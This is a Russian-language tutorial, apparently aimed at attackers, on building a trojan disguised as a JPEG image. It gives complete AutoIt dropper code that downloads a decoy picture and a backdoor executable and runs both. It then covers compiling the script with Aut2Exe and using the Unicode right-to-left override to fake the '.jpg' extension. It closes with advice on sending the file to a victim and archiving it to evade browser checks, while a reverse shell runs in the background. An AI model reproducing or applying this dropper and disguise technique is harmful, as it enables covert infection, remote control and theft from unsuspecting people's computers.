В этом учебном пособии мы хотим показать вам, как заблокировать файл изображения и создать из него троянскую программу. Этот метод может применяться к любому типу файлов; pdf, txt, doc, excel, exe и так далее. Без дальнейших церемоний, давайте начнем.

Откройте любой файловый редактор и скопируйте/вставьте простой код, написанный ниже.

#include <StaticConstants.au3>
#include <WindowsConstants.au3>
Local $urls = “url1,url2”
Local $urlsArray = StringSplit($urls, “,”, 2 )
For $url In $urlsArray
$sFile = _DownloadFile($url)
shellExecute($sFile)
NExt
Func _DownloadFile($sURL)
Local $hDownload, $sFile
$sFile = StringRegExpReplace($sURL, “^.*/”, ““)
$sDirectory = @TempDir & $sFile
$hDownload = InetGet($sURL, $sDirectory, 17, 1)
InetClose($hDownload)
Return $sDirectory
EndFunc   ;==>_GetURLImage

Как показано на снимке экрана, для "url1" добавьте прямую ссылку на файл, который вы хотите отобразить на компьютере, а для "url2" добавьте прямую ссылка на исполняемый бэкдор.

Затем сохраните и переименуйте файл, добавив в конце расширение .au3.

Теперь нам нужно скомпилировать его в компиляторе AutoIt "Aut2Exe", чтобы сделать файл исполняемым.

1. Откройте меню Kali и найдите AutoIt v3.

2. Нажмите «Скомпилировать скрипт в .exe».

3. Должен появиться основной интерфейс Aut2Exe.

4. С помощью кнопок "Обзор" выберите исходный файл ".au3" и выходные файлы ".exe".

5. При желании вы можете изменить значок полученного файла «.exe». (Мы настоятельно рекомендуем вам посетить некоторые онлайн-страницы, которые создают значки. Этот процесс относительно прост и не будет здесь объясняться).

6. Другой параметр, который вы, возможно, захотите изменить, — это уровень сжатия. Используйте меню «Сжатие», чтобы настроить это. Как и во всех процедурах сжатия, чем лучше выбранное вами сжатие, тем медленнее оно будет. Однако независимо от того, какой уровень сжатия вы выберете, скорость распаковки будет одинаковой.

7. Нажмите «Преобразовать», чтобы скомпилировать скрипт.

Наш исполняемый код готов и сохранен на рабочем столе как "nissan-gtr.Exe". Чтобы сделать этот файл более убедительным, нам нужно изменить расширение ".exe" на «.jpg». Для этого мы будем использовать инструмент предварительной сборки в Kali Linux под названием «персонаж». Найдите приложение и запустите. Затем в приложении найдите "Right-To-Left-Override". Нажмите на него и скопируйте символ.

«Переопределение справа налево» – это Unicode, который в основном используется для написания и чтения текста на арабском языке или иврите. В Unicode есть особый символ U+202e, который указывает компьютерам отображать текст, следующий за ним, в порядке справа налево. Эта уязвимость используется для маскировки имен файлов и может быть прикреплена к носителю, например к электронной почте. Например, имя файла с "nissan-gtrgpj.exe" на самом деле "nissan-gtrgpj.jpg", который является исполняемым файлом с "U +202e”, расположенный непосредственно перед “gpj”.

Как показано на изображении выше, в редакторе файлов мы написали имя файла как «nissan-gtrgpj.exe» и вставили скопированное «U+202e» между буквами «gtr»и «gpj».

Он изменит расширение “.exe” на буквы “gpj”, но написанные справа налево. Таким образом, имя нашего файла будет выглядеть как "nissan-gtrexe.jpg".

Затем скопируйте новое имя и переименуйте исполняемый файл. Теперь он готов к отправке жертве. Как видно на скриншоте, наш троянский файл выглядит очень убедительно. Как только он будет открыт на целевом компьютере, наша жертва увидит только изображение автомобиля и не будет знать о том, что бэкдор работает в фоновом режиме, отправляя злоумышленнику обратную оболочку.

Примечание. Рекомендуется архивировать исполняемые файлы перед их отправкой, поскольку некоторые браузеры могут вернуть поддельные расширения к исходным.